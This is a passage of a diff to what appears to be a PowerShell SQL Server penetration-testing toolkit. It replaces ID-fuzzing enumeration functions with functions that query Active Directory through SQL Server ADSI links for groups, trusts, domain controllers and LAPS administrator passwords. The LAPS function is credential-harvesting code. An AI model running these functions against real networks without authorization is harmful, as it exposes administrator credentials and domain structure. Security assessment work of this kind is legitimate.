$Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose - } - - # Get role for each database - $TblDatabases | - ForEach-Object -Process { - # Get database name - $DbName = $_.DatabaseName - - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : - $DbName" - } - # Define Query - $Query = " use [$DbName]; - SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - ROUTINE_CATALOG AS [DatabaseName], - ROUTINE_SCHEMA AS [SchemaName], - ROUTINE_NAME as [ProcedureName], - ROUTINE_TYPE as [ProcedureType], - ROUTINE_DEFINITION as [ProcedureDefinition], - SQL_DATA_ACCESS, - ROUTINE_BODY, - CREATED, - LAST_ALTERED - FROM [INFORMATION_SCHEMA].[ROUTINES] WHERE 1=1 - $ProcedureNameFilter" + $Results | ForEach-Object { - # Execute Query - $TblProcsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + # Add results to table + $TableAccountPolicy.Rows.Add( + $_.pwdHistoryLength, + $_.lockoutThreshold, + [string]([string]$_.lockoutDuration -replace '-','') / (60 * 10000000), + [string]([string]$_.lockOutObservationWindow -replace '-','') / (60 * 10000000), + $_.minPwdLength, + [string][Math]::Floor([decimal](((([string]$_.minPwdAge -replace '-','') / (60 * 10000000)/60))/24)), + [string]$_.pwdProperties, + [string]$_.whenChanged, + [string]$_.gPLink + ) | Out-Null - # Append results - $TblProcs = $TblProcs + $TblProcsTemp } + + $TableAccountPolicy } End - { - # Return data - $TblProcs + { } } - -#endregion - -######################################################################### -# -#region UTILITY FUNCTIONS -# -######################################################################### - # ---------------------------------- -# Get-SQLFuzzObjectName +# Get-SQLDomainGroup # ---------------------------------- -# Author: Scott Sutherland -# Reference: https://raresql.com/2013/01/29/sql-server-all-about-object_id/ -# Reference: https://social.technet.microsoft.com/Forums/forefront/en-US/f73c2115-57f7-4cec-a95b-00c2d8252ace/objectid-recycled-?forum=transactsql -Function Get-SQLFuzzObjectName +# Author: Scott Sutherland, Thomas Elling +Function Get-SQLDomainGroup { <# .SYNOPSIS - Enumerates objects based on object id using OBJECT_NAME() and only the Public role. + Using the OLE DB ADSI provider, query Active Directory for a list of domain groups + via the domain logon server associated with the SQL Server. This can be + done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc + flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. + .PARAMETER LinkUsername + Domain account used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER LinkPassword + Domain account password used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER UseAdHoc + Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER StartId - Principal ID to start fuzzing with. - .PARAMETER EndId - Principal ID to stop fuzzing with. + .PARAMETER TargetDomain + Domain to query. + .PARAMETER FilterGroup + Domain group to filter for. .EXAMPLE - PS C:\> Get-SQLFuzzObjectName -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 5 - - ComputerName Instance ObjectId ObjectName - ------------ -------- -------- ---------- - SQLServer1 SQLServer1\STANDARDDEV2014 3 sysrscols - SQLServer1 SQLServer1\STANDARDDEV2014 5 sysrowsets - SQLServer1 SQLServer1\STANDARDDEV2014 6 sysclones - SQLServer1 SQLServer1\STANDARDDEV2014 7 sysallocunits - SQLServer1 SQLServer1\STANDARDDEV2014 8 sysfiles1 + PS C:\> Get-SQLDomainGroup -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc + .EXAMPLE + PS C:\> Get-SQLDomainGroup -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLDomainGroup -Instance SQLServer1\STANDARDDEV2014 -Verbose + .EXAMPLE + PS C:\> Get-SQLDomainGroup -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDomainGroup -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account to authenticate with.')] + HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account password to authenticate with.')] + HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkUsername, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkPassword, + [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] @@ -7251,12 +8558,18 @@ Function Get-SQLFuzzObjectName [string]$Instance, [Parameter(Mandatory = $false, - HelpMessage = 'Principal ID to start fuzzing with.')] - [string]$StartId = 1, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain group to filter for.')] + [string]$FilterGroup, [Parameter(Mandatory = $false, - HelpMessage = 'Principal ID to stop fuzzing on.')] - [string]$EndId = 300, + HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] + [Switch]$UseAdHoc, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain to query.')] + [string]$TargetDomain, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -7265,138 +8578,90 @@ Function Get-SQLFuzzObjectName Begin { - # Table for output - $TblFuzzedObjects = New-Object -TypeName System.Data.DataTable - } - - Process - { - # All user defined objects are assigned a positive object ID plus system tables. - # Apart from these objects, the rest of the system objects are assigned negative object IDs. - # This object_id comes from the primary key of system table sys.sysschobjs.The column name is id, int data type and it is not an identity column - # If you create a new object in the database, the first ID will always be 2073058421 in SQL SERVER 2005 and 245575913 in SQL SERVER 2012. - # The object_ID increment counter for user defined objects will add 16000057 + Last user defined object_ID and will give you a new ID. - <# IThis object_id comes from the primary key of system table sys.sysschobjs. The new object_id will increase 16000057 (a prime number) from - last object_id. When the last object_id +16000057 is over the int maximum ( 2147483647), it will start with a new number before the difference - between the new bigint number and the maximum int. This cycle will generate 134 or 135 new object_id for each cycle. The system has a maximum - number of objects, which is 2147483647. - The object ID is only unique within each database. - #> - - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - - # Default connection to local default instance + # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Success." - Write-Verbose -Message "$Instance : Enumerating objects from object IDs..." - } - } - else - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Failed." - } - return + # Setup group filter + if((-not $FilterGroup)){ + $FilterGroup = '*' } + } - # Fuzz from StartId to EndId - $StartId..$EndId | - ForEach-Object -Process { - # Define Query - $Query = "SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - '$_' as [ObjectId], - OBJECT_NAME($_) as [ObjectName]" - - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - - $ObjectName = $TblResults.ObjectName - if( -not $SuppressVerbose) - { - if($ObjectName.length -ge 2) - { - Write-Verbose -Message "$Instance : - Object ID $_ resolved to: $ObjectName" - } - else - { - Write-Verbose -Message "$Instance : - Object ID $_ resolved to: " - } - } - - # Append results - $TblFuzzedObjects = $TblFuzzedObjects + $TblResults + Process + { + # Call Get-SQLDomainObject + if($UseAdHoc){ + Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(&(objectClass=Group)(SamAccountName=$FilterGroup))" -LdapFields 'samaccountname,adminCount,whencreated,whenchanged,adspath' -UseAdHoc + }else{ + Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(&(objectClass=Group)(SamAccountName=$FilterGroup))" -LdapFields 'samaccountname,adminCount,whencreated,whenchanged,adspath' } } End - { - # Return data - $TblFuzzedObjects | Where-Object -FilterScript { - $_.ObjectName.length -ge 2 - } + { } } - # ---------------------------------- -# Get-SQLFuzzDatabaseName +# Get-SQLDomainTrust # ---------------------------------- -# Author: Scott Sutherland -Function Get-SQLFuzzDatabaseName +# Author: Scott Sutherland, Thomas Elling +Function Get-SQLDomainTrust { <# .SYNOPSIS - Enumerates databases based on database id using DB_NAME() and only the Public role. + Using the OLE DB ADSI provider, query Active Directory for a list of domain trusts + via the domain logon server associated with the SQL Server. This can be + done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc + flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. + .PARAMETER LinkUsername + Domain account used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER LinkPassword + Domain account password used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER UseAdHoc + Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER StartId - Principal ID to start fuzzing with. - .PARAMETER EndId - Principal ID to stop fuzzing with. + .PARAMETER TargetDomain + Domain to query. .EXAMPLE - PS C:\> Get-SQLFuzzDatabaseName -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 5 - - ComputerName Instance DatabaseId DatabaseName - ------------ -------- ---------- ------------ - SQLServer1 SQLServer1\STANDARDDEV2014 1 master - SQLServer1 SQLServer1\STANDARDDEV2014 2 tempdb - SQLServer1 SQLServer1\STANDARDDEV2014 3 model - SQLServer1 SQLServer1\STANDARDDEV2014 4 msdb - SQLServer1 SQLServer1\STANDARDDEV2014 5 ReportServer$STANDARDDEV2014 + PS C:\> Get-SQLDomainTrust -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc + .EXAMPLE + PS C:\> Get-SQLDomainTrust -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLDomainTrust -Instance SQLServer1\STANDARDDEV2014 -Verbose + .EXAMPLE + PS C:\> Get-SQLDomainTrust -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDomainTrust -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account to authenticate with.')] + HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account password to authenticate with.')] + HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkUsername, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkPassword, + [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] @@ -7408,12 +8673,13 @@ Function Get-SQLFuzzDatabaseName [string]$Instance, [Parameter(Mandatory = $false, - HelpMessage = 'Principal ID to start fuzzing with.')] - [string]$StartId = 1, + HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] + [Switch]$UseAdHoc, [Parameter(Mandatory = $false, - HelpMessage = 'Principal ID to stop fuzzing on.')] - [string]$EndId = 300, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain to query.')] + [string]$TargetDomain, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -7422,166 +8688,146 @@ Function Get-SQLFuzzDatabaseName Begin { - # Table for output - $TblFuzzedDbs = New-Object -TypeName System.Data.DataTable - } - - Process - { - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - - # Default connection to local default instance + # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } + $TblTrusts = New-Object System.Data.DataTable + $TblTrusts.Columns.Add("TrustedDomain") | Out-Null + $TblTrusts.Columns.Add("TrustedDomainDn") | Out-Null + $TblTrusts.Columns.Add("Trusttype") | Out-Null + $TblTrusts.Columns.Add("Trustdirection") | Out-Null + $TblTrusts.Columns.Add("Trustattributes") | Out-Null + $TblTrusts.Columns.Add("Whencreated") | Out-Null + $TblTrusts.Columns.Add("Whenchanged") | Out-Null + $TblTrusts.Columns.Add("Objectclass") | Out-Null + $TblTrusts.Clear() + } - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Success." - Write-Verbose -Message "$Instance : Enumerating database names from database IDs..." - } - } - else - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Failed." - } - return + Process + { + # Call Get-SQLDomainObject + if($UseAdHoc){ + $Result = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(objectClass=trustedDomain)" -LdapFields 'trustpartner,distinguishedname,trusttype,trustdirection,trustattributes,whencreated,whenchanged,adspath' -UseAdHoc + }else{ + $Result = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(objectClass=trustedDomain)" -LdapFields 'trustpartner,distinguishedname,trusttype,trustdirection,trustattributes,whencreated,whenchanged,adspath' } - # Fuzz from StartId to EndId - $StartId..$EndId | - ForEach-Object -Process { - # Define Query - $Query = "SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - '$_' as [DatabaseId], - DB_NAME($_) as [DatabaseName]" + $Result | ForEach-Object { - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + # Resolve trust direction + $TrustDirection = Switch ($_.trustdirection) { + 0 { "Disabled" } + 1 { "Inbound" } + 2 { "Outbound" } + 3 { "Bidirectional" } + } - $DatabaseName = $TblResults.DatabaseName - if($DatabaseName.length -ge 2) - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : - ID $_ - Resolved to: $DatabaseName" + # Resolve trust attribute + $TrustAttrib = Switch ($_.trustattributes){ + 0x001 { "non_transitive" } + 0x002 { "uplevel_only" } + 0x004 { "quarantined_domain" } + 0x008 { "forest_transitive" } + 0x010 { "cross_organization" } + 0x020 { "within_forest" } + 0x040 { "treat_as_external" } + 0x080 { "trust_uses_rc4_encryption" } + 0x100 { "trust_uses_aes_keys" } + Default { + $_.trustattributes } } - else - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : - ID $_ - Resolved to:" - } + + # Resolve trust type + # Reference: https://support.microsoft.com/en-us/kb/228477 + $TrustType = Switch ($_.trusttype){ + 1 {"Downlevel Trust (Windows NT domain external)"} + 2 {"Uplevel Trust (Active Directory domain - parent-child, root domain, shortcut, external, or forest)"} + 3 {"MIT (non-Windows Kerberos version 5 realm)"} + 4 {"DCE (Theoretical trust type - DCE refers to Open Group's Distributed Computing)"} } - # Append results - $TblFuzzedDbs = $TblFuzzedDbs + $TblResults + # Add trust to table + $TblTrusts.Rows.Add( + [string]$_.trustpartner, + [string]$_.distinguishedname, + [string]$TrustType, + [string]$TrustDirection, + [string]$TrustAttrib, + [string]$_.whencreated, + [string]$_.whenchanged, + [string]$_.objectclass + ) | Out-Null + } + + $TblTrusts } End - { - # Return data - $TblFuzzedDbs | Where-Object -FilterScript { - $_.DatabaseName.length -ge 2 - } + { } } - # ---------------------------------- -# Get-SQLFuzzServerLogin +# Get-SQLDomainPasswordsLAPS # ---------------------------------- -# Author: Scott Sutherland -Function Get-SQLFuzzServerLogin +# Author: Scott Sutherland, Thomas Elling +Function Get-SQLDomainPasswordsLAPS { <# .SYNOPSIS - Enumerates SQL Server Logins based on login id using SUSER_NAME() and only the Public role. + Using the OLE DB ADSI provider, query Active Directory for a list of domain LAPS passwords + via the domain logon server associated with the SQL Server. This can be + done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc + flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. + .PARAMETER LinkUsername + Domain account used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER LinkPassword + Domain account password used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER UseAdHoc + Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER StartId - Principal ID to start fuzzing with. - .PARAMETER EndId - Principal ID to stop fuzzing with. - .PARAMETER GetRole - Checks if the principal name is a role, SQL login, or Windows account. + .PARAMETER TargetDomain + Domain to query. .EXAMPLE - PS C:\> Get-SQLFuzzServerLogin -Instance SQLServer1\STANDARDDEV2014 -StartId 1 -EndId 500 | Select-Object -First 40 - - ComputerName Instance PrincipalId PrincipleName - ------------ -------- ---------- ------------- - SQLServer1 SQLServer1\STANDARDDEV2014 1 sa - SQLServer1 SQLServer1\STANDARDDEV2014 2 public - SQLServer1 SQLServer1\STANDARDDEV2014 3 sysadmin - SQLServer1 SQLServer1\STANDARDDEV2014 4 securityadmin - SQLServer1 SQLServer1\STANDARDDEV2014 5 serveradmin - SQLServer1 SQLServer1\STANDARDDEV2014 6 setupadmin - SQLServer1 SQLServer1\STANDARDDEV2014 7 processadmin - SQLServer1 SQLServer1\STANDARDDEV2014 8 diskadmin - SQLServer1 SQLServer1\STANDARDDEV2014 9 dbcreator - SQLServer1 SQLServer1\STANDARDDEV2014 10 bulkadmin - SQLServer1 SQLServer1\STANDARDDEV2014 101 ##MS_SQLResourceSigningCertificate## - SQLServer1 SQLServer1\STANDARDDEV2014 102 ##MS_SQLReplicationSigningCertificate## - SQLServer1 SQLServer1\STANDARDDEV2014 103 ##MS_SQLAuthenticatorCertificate## - SQLServer1 SQLServer1\STANDARDDEV2014 105 ##MS_PolicySigningCertificate## - SQLServer1 SQLServer1\STANDARDDEV2014 106 ##MS_SmoExtendedSigningCertificate## - SQLServer1 SQLServer1\STANDARDDEV2014 121 ##Agent XPs## - SQLServer1 SQLServer1\STANDARDDEV2014 122 ##SQL Mail XPs## - SQLServer1 SQLServer1\STANDARDDEV2014 123 ##Database Mail XPs## - SQLServer1 SQLServer1\STANDARDDEV2014 124 ##SMO and DMO XPs## - SQLServer1 SQLServer1\STANDARDDEV2014 125 ##Ole Automation Procedures## - SQLServer1 SQLServer1\STANDARDDEV2014 126 ##Web Assistant Procedures## - SQLServer1 SQLServer1\STANDARDDEV2014 127 ##xp_cmdshell## - SQLServer1 SQLServer1\STANDARDDEV2014 128 ##Ad Hoc Distributed Queries## - SQLServer1 SQLServer1\STANDARDDEV2014 129 ##Replication XPs## - SQLServer1 SQLServer1\STANDARDDEV2014 257 ##MS_PolicyTsqlExecutionLogin## - SQLServer1 SQLServer1\STANDARDDEV2014 259 Domain\User - SQLServer1 SQLServer1\STANDARDDEV2014 260 NT SERVICE\SQLWriter - SQLServer1 SQLServer1\STANDARDDEV2014 261 NT SERVICE\Winmgmt - SQLServer1 SQLServer1\STANDARDDEV2014 262 NT Service\MSSQL$STANDARDDEV2014 - SQLServer1 SQLServer1\STANDARDDEV2014 263 NT AUTHORITY\SYSTEM - SQLServer1 SQLServer1\STANDARDDEV2014 264 NT SERVICE\SQLAgent$STANDARDDEV2014 - SQLServer1 SQLServer1\STANDARDDEV2014 265 NT SERVICE\ReportServer$STANDARDDEV2014 - SQLServer1 SQLServer1\STANDARDDEV2014 266 ##MS_PolicyEventProcessingLogin## - SQLServer1 SQLServer1\STANDARDDEV2014 267 ##MS_AgentSigningCertificate## - SQLServer1 SQLServer1\STANDARDDEV2014 268 MySQLUser1 - SQLServer1 SQLServer1\STANDARDDEV2014 270 MySQLUser2 - SQLServer1 SQLServer1\STANDARDDEV2014 271 MySQLUser3 - SQLServer1 SQLServer1\STANDARDDEV2014 272 MySysadmin1 - SQLServer1 SQLServer1\STANDARDDEV2014 273 Domain\User2 - SQLServer1 SQLServer1\STANDARDDEV2014 274 MySysadmin2 + PS C:\> Get-SQLDomainPasswordsLAPS -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc + .EXAMPLE + PS C:\> Get-SQLDomainPasswordsLAPS -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLDomainPasswordsLAPS -Instance SQLServer1\STANDARDDEV2014 -Verbose + .EXAMPLE + PS C:\> Get-SQLDomainPasswordsLAPS -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDomainPasswordsLAPS -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account to authenticate with.')] + HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account password to authenticate with.')] + HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkUsername, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkPassword, + [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] @@ -7593,16 +8839,13 @@ Function Get-SQLFuzzServerLogin [string]$Instance, [Parameter(Mandatory = $false, - HelpMessage = 'Principal ID to start fuzzing with.')] - [string]$StartId = 1, - - [Parameter(Mandatory = $false, - HelpMessage = 'Principal ID to stop fuzzing on.')] - [string]$EndId = 300, + HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] + [Switch]$UseAdHoc, [Parameter(Mandatory = $false, - HelpMessage = 'Try to determine if the principal type is role, SQL login, or Windows account via error analysis of sp_defaultdb.')] - [switch]$GetPrincipalType, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain to query.')] + [string]$TargetDomain, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -7611,196 +8854,211 @@ Function Get-SQLFuzzServerLogin Begin { - # Table for output - $TblFuzzedLogins = New-Object -TypeName System.Data.DataTable - $null = $TblFuzzedLogins.Columns.add('ComputerName') - $null = $TblFuzzedLogins.Columns.add('Instance') - $null = $TblFuzzedLogins.Columns.add('PrincipalId') - $null = $TblFuzzedLogins.Columns.add('PrincipleName') - if($GetPrincipalType) + # set instance to local host by default + if(-not $Instance) { - $null = $TblFuzzedLogins.Columns.add('PrincipleType') + $Instance = $env:COMPUTERNAME } + + $TableLAPS = New-Object System.Data.DataTable + $TableLAPS.Columns.Add('Hostname') | Out-Null + $TableLAPS.Columns.Add('Password') | Out-Null + $TableLAPS.Clear() } Process { - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - - # Default connection to local default instance - if(-not $Instance) - { - $Instance = $env:COMPUTERNAME + # Call Get-SQLDomainObject + if($UseAdHoc){ + $Result = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(objectCategory=Computer)" -LdapFields 'dnshostname,ms-MCS-AdmPwd,adspath' -UseAdHoc + }else{ + $Result = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(objectCategory=Computer)" -LdapFields 'dnshostname,ms-MCS-AdmPwd,adspath' } + + $Result | ForEach-Object { + $CurrentHost = $_.dnshostname + $CurrentPassword = $_.'ms-MCS-AdmPwd' - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) + # Check for readable password and add to table + if ([string]$CurrentPassword) { - Write-Verbose -Message "$Instance : Connection Success." - Write-Verbose -Message "$Instance : Enumerating principal names from principal IDs.." - } - } - else - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Failed." + # Add domain computer to data table + $TableLAPS.Rows.Add($CurrentHost,$CurrentPassword) | Out-Null } - return } + + $TableLAPS + + } - # Fuzz from StartId to EndId - $StartId..$EndId | - ForEach-Object -Process { - # Define Query - $Query = "SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - '$_' as [PrincipalId], - SUSER_NAME($_) as [PrincipleName]" + End + { + } +} - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose +# ---------------------------------- +# Get-SQLDomainController +# ---------------------------------- +# Author: Scott Sutherland, Thomas Elling +Function Get-SQLDomainController +{ + <# + .SYNOPSIS + Using the OLE DB ADSI provider, query Active Directory for a list of domain controllers + via the domain logon server associated with the SQL Server. This can be + done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc + flag to switch between modes. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER LinkUsername + Domain account used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER LinkPassword + Domain account password used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER UseAdHoc + Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER TargetDomain + Domain to query. + .EXAMPLE + PS C:\> Get-SQLDomainController -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc + .EXAMPLE + PS C:\> Get-SQLDomainController -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLDomainController -Instance SQLServer1\STANDARDDEV2014 -Verbose + .EXAMPLE + PS C:\> Get-SQLDomainController -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDomainController -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] + [string]$Username, - # check if principal is role, sql login, or windows account - $PrincipalName = $TblResults.PrincipleName - $PrincipalId = $TblResults.PrincipalId + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] + [string]$Password, - if($GetPrincipalType) - { - $RoleCheckQuery = "EXEC master..sp_defaultdb '$PrincipalName', 'NOTAREALDATABASE1234ABCD'" - $RoleCheckResults = Get-SQLQuery -Instance $Instance -Query $RoleCheckQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -ReturnError + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkUsername, - # Check the error message for a signature that means the login is real - if (($RoleCheckResults -like '*NOTAREALDATABASE*') -or ($RoleCheckResults -like '*alter the login*')) - { - # - if($PrincipalName -like '*\*') - { - $PrincipalType = 'Windows Account' - } - else - { - $PrincipalType = 'SQL Login' - } - } - else - { - $PrincipalType = 'SQL Server Role' - } - } + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkPassword, - # Output for user - if(-not $SuppressVerbose) - { - if($PrincipalName.length -ge 2) - { - Write-Verbose -Message "$Instance : - Principal ID $_ 